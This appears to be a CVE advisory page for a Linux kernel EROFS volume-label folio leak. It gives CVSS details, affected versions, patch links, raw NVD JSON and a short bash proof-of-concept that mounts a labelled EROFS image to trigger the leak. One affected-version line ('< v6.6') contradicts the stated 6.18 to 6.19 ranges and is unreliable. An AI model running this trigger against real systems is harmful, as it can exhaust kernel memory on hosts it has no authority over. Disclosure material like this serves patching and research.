Security Vulnerability Report
CVE-2026-43154 CVSS 5.5 MEDIUM

Published: 2026-05-06 12:16:33
Last Modified: 2026-05-13 20:06:25
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

erofs: fix incorrect early exits in volume label handling

Crafted EROFS images containing valid volume labels can trigger incorrect early returns, leading to folio reference leaks.

However, this does not cause system crashes or other severe issues.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

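cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.18 up to, but excluding, 6.18.16) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.19 up to, but excluding, 6.19.6) - VULNERABLE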
Linux Kernel < v6.6 (Specific commits fix this)
Linux Kernel stable branches prior to commits 3afa4da, 8d8a878, d498bd1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-43154: EROFS Volume Label Folio Leak
# This script demonstrates the trigger condition: mounting a crafted EROFS image.
# Note: Reproducing the specific leak requires a kernel built before the patch
# and potentially specific image parameters, but the vector is the mount operation.

IMAGE_FILE="crafted_erofs.img"
MOUNT_DIR="/tmp/erofs_poc"
SOURCE_DIR="source_erofs"

# 1. Prepare a directory structure
mkdir -p "$SOURCE_DIR"
echo "Sensitive Data" > "$SOURCE_DIR/file.txt"

# 2. Create an EROFS image with a volume label
# The vulnerability is triggered during the handling of this label.
# Using 'mkfs.erofs' to create a valid image structure.
echo "[*] Creating EROFS image with volume label..."
if command -v mkfs.erofs &> /dev/null; then
    mkfs.erofs -L "VulnLabel_CVE-2026-43154" "$IMAGE_FILE" "$SOURCE_DIR"
else
    echo "[!] mkfs.erofs not found. Please install erofs-utils."
    exit 1
fi

# 3. Prepare mount point
mkdir -p "$MOUNT_DIR"

# 4. Trigger the vulnerability
# The leak occurs when the kernel processes the superblock and volume label
echo "[*] Attempting to mount image to trigger early exit path..."
sudo mount -t erofs -o loop "$IMAGE_FILE" "$MOUNT_DIR" 2>/dev/null

if [ $? -eq 0 ]; then
    echo "[+] Image mounted successfully. Memory leak may have occurred."
    # In a real test environment, use 'slabtop' or kernel debug tools to monitor folio leaks.
    sleep 1
    sudo umount "$MOUNT_DIR"
else
    echo "[-] Mount failed. Check kernel logs (dmesg)."
fi

# Cleanup
rm -rf "$SOURCE_DIR" "$IMAGE_FILE" "$MOUNT_DIR"
echo "[*] Cleanup complete."

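References

https://git.kernel.org/stable/c/3afa4da38802a4cba1c23848a32284e7e57b831b (Patch)
https://git.kernel.org/stable/c/8d8a878ef60801d867119b3df6a93e2982d62a71 (Patch)
https://git.kernel.org/stable/c/d498bd168494ad4a4bce16192bfb9ce04ca19c9a (Patch)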

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43154", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:33.193", "lastModified": "2026-05-13T20:06:24.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix incorrect early exits in volume label handling\n\nCrafted EROFS images containing valid volume labels can trigger\nincorrect early returns, leading to folio reference leaks.\n\nHowever, this does not cause system crashes or other severe issues."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18", "versionEndExcluding": "6.18.16", "matchCriteriaId": "E0D300DB-AA68-4962-981D-EF9F5E97AACF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3afa4da38802a4cba1c23848a32284e7e57b831b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d8a878ef60801d867119b3df6a93e2982d62a71", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d498bd168494ad4a4bce16192bfb9ce04ca19c9a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}